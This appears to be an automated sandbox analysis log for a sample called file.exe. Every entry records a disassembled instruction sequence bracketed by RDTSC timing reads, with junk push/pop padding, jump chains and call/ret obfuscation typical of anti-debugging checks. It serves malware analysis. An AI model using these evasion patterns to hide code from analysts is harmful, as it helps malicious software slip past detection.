              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3B9 second address: 91C3C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3C3 second address: 91C3C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3C7 second address: 91C3CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C3CB second address: 91C407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F5A4D20A9F8h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F5A4D20A9FEh 0x0000001a jmp 00007F5A4D20AA08h 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91C407 second address: 91C41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5A4CBCDC73h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926809 second address: 926813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926A79 second address: 926A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926A7F second address: 926A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926A87 second address: 926A9F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5A4CBCDC72h 0x00000008 ja 00007F5A4CBCDC66h 0x0000000e jng 00007F5A4CBCDC66h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 926A9F second address: 926AA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE61 second address: 92DE65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE65 second address: 92DE87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE87 second address: 92DE8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE8D second address: 92DE92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE92 second address: 92DE98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92DE98 second address: 92DE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E061 second address: 92E093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007F5A4CBCDC76h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F5A4CBCDC6Ch 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E093 second address: 92E099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E099 second address: 92E09D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92E09D second address: 92E0C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20AA03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932F1E second address: 932F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5A4CBCDC66h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932255 second address: 932263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932263 second address: 932293 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC75h 0x00000007 jmp 00007F5A4CBCDC71h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932293 second address: 932299 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325BC second address: 9325CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5A4CBCDC66h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93273D second address: 93274D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93274D second address: 93275B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F5A4CBCDC66h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93275B second address: 932761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932761 second address: 932767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932C2F second address: 932C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932C33 second address: 932C46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9354E2 second address: 9354E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935ACE second address: 935AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 935AD2 second address: 935AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edi 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936007 second address: 936011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5A4CBCDC66h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 936499 second address: 93649E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93861F second address: 9386A7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F5A4CBCDC6Fh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F5A4CBCDC68h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F5A4CBCDC67h 0x0000002c cmc 0x0000002d mov edi, dword ptr [ebp+122D3A7Ah] 0x00000033 push 00000000h 0x00000035 call 00007F5A4CBCDC74h 0x0000003a pop edi 0x0000003b push 00000000h 0x0000003d cmc 0x0000003e jmp 00007F5A4CBCDC79h 0x00000043 xchg eax, ebx 0x00000044 jbe 00007F5A4CBCDC89h 0x0000004a push eax 0x0000004b push edx 0x0000004c js 00007F5A4CBCDC66h 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9390D3 second address: 9390FA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F5A4D20AA08h 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939AB8 second address: 939ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 938DFF second address: 938E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5A4D20A9FCh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939ABD second address: 939B5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5A4CBCDC71h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F5A4CBCDC76h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F5A4CBCDC68h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c call 00007F5A4CBCDC6Bh 0x00000031 pop edi 0x00000032 jng 00007F5A4CBCDC6Ch 0x00000038 sub dword ptr [ebp+122D2E51h], eax 0x0000003e push 00000000h 0x00000040 mov di, dx 0x00000043 and edi, dword ptr [ebp+122D2880h] 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push ebp 0x0000004e call 00007F5A4CBCDC68h 0x00000053 pop ebp 0x00000054 mov dword ptr [esp+04h], ebp 0x00000058 add dword ptr [esp+04h], 0000001Ah 0x00000060 inc ebp 0x00000061 push ebp 0x00000062 ret 0x00000063 pop ebp 0x00000064 ret 0x00000065 push eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 jno 00007F5A4CBCDC66h 0x0000006f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940259 second address: 940262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940262 second address: 9402B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 sbb bx, EAB0h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebx 0x00000013 call 00007F5A4CBCDC68h 0x00000018 pop ebx 0x00000019 mov dword ptr [esp+04h], ebx 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc ebx 0x00000026 push ebx 0x00000027 ret 0x00000028 pop ebx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D3816h] 0x00000030 push 00000000h 0x00000032 mov di, C9D8h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 ja 00007F5A4CBCDC75h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9412FE second address: 941302 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94229E second address: 9422A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F5A4CBCDC66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9422A9 second address: 942309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F5A4D20A9F8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 and di, 93BAh 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D1D90h], edi 0x00000030 sub dword ptr [ebp+122D22FFh], eax 0x00000036 popad 0x00000037 jbe 00007F5A4D20A9FCh 0x0000003d sbb ebx, 013FCF67h 0x00000043 push 00000000h 0x00000045 pushad 0x00000046 push eax 0x00000047 mov esi, dword ptr [ebp+122D2A24h] 0x0000004d pop ecx 0x0000004e mov dl, bl 0x00000050 popad 0x00000051 push 00000000h 0x00000053 xor bh, 0000002Dh 0x00000056 push eax 0x00000057 pushad 0x00000058 pushad 0x00000059 push edx 0x0000005a pop edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943299 second address: 94329D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94329D second address: 9432A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9432A1 second address: 9432A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9453A8 second address: 945410 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA09h 0x00000009 popad 0x0000000a pop ebx 0x0000000b nop 0x0000000c push eax 0x0000000d mov ebx, dword ptr [ebp+122D37C2h] 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 je 00007F5A4D20A9FCh 0x0000001c mov dword ptr [ebp+122D2A24h], edi 0x00000022 mov dword ptr [ebp+1247F5B6h], ecx 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push ebp 0x0000002d call 00007F5A4D20A9F8h 0x00000032 pop ebp 0x00000033 mov dword ptr [esp+04h], ebp 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc ebp 0x00000040 push ebp 0x00000041 ret 0x00000042 pop ebp 0x00000043 ret 0x00000044 mov edi, 136C9D90h 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945410 second address: 945415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945415 second address: 945444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5A4D20AA02h 0x00000008 jnp 00007F5A4D20A9F6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5A4D20A9FEh 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 945444 second address: 945449 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 946488 second address: 94650B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5A4D20A9F8h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D1973h] 0x00000013 push 00000000h 0x00000015 mov edi, dword ptr [ebp+122D195Fh] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebp 0x00000020 call 00007F5A4D20A9F8h 0x00000025 pop ebp 0x00000026 mov dword ptr [esp+04h], ebp 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc ebp 0x00000033 push ebp 0x00000034 ret 0x00000035 pop ebp 0x00000036 ret 0x00000037 jnc 00007F5A4D20A9FCh 0x0000003d xchg eax, esi 0x0000003e pushad 0x0000003f push ebx 0x00000040 jmp 00007F5A4D20AA06h 0x00000045 pop ebx 0x00000046 jc 00007F5A4D20A9FCh 0x0000004c jns 00007F5A4D20A9F6h 0x00000052 popad 0x00000053 push eax 0x00000054 pushad 0x00000055 push ecx 0x00000056 pushad 0x00000057 popad 0x00000058 pop ecx 0x00000059 jng 00007F5A4D20A9FCh 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C6B0 second address: 94C6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC6Fh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C6C4 second address: 94C6E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F5A4D20A9F8h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C6E2 second address: 94C6E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C6E7 second address: 94C75F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F5A4D20A9F8h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 xor dword ptr [ebp+122D1E2Ah], ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007F5A4D20A9F8h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 add ebx, dword ptr [ebp+122D3A76h] 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 jo 00007F5A4D20A9F6h 0x00000058 jmp 00007F5A4D20AA03h 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D815 second address: 94D898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5A4CBCDC77h 0x0000000f nop 0x00000010 jmp 00007F5A4CBCDC72h 0x00000015 mov edi, 5D2573A5h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F5A4CBCDC68h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Bh 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 adc edi, 05BC34AFh 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f mov bh, 2Ah 0x00000041 pop edi 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 push ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D898 second address: 94D8A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F5A4D20A9F6h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955CB0 second address: 955CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 955E0A second address: 955E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jg 00007F5A4D20A9F6h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95B97A second address: 95B990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961262 second address: 961267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960905 second address: 96091D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A4CBCDC6Eh 0x00000008 jbe 00007F5A4CBCDC66h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jc 00007F5A4CBCDC6Eh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960A8E second address: 960AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5A4D20A9FEh 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960C2F second address: 960C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960C33 second address: 960C54 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 ja 00007F5A4D20AA22h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5A4D20AA02h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960DB5 second address: 960DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960F8D second address: 960F99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F5A4D20A9F6h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960F99 second address: 960FA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960FA7 second address: 960FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960FAB second address: 960FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9610DB second address: 9610F3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5A4D20A9FCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9610F3 second address: 9610F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9644D8 second address: 9644F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4D20AA09h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9644F5 second address: 964509 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5A4CBCDC6Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96A5EC second address: 96A605 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5A4D20A9F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F5A4D20A9F6h 0x00000011 jnp 00007F5A4D20A9F6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
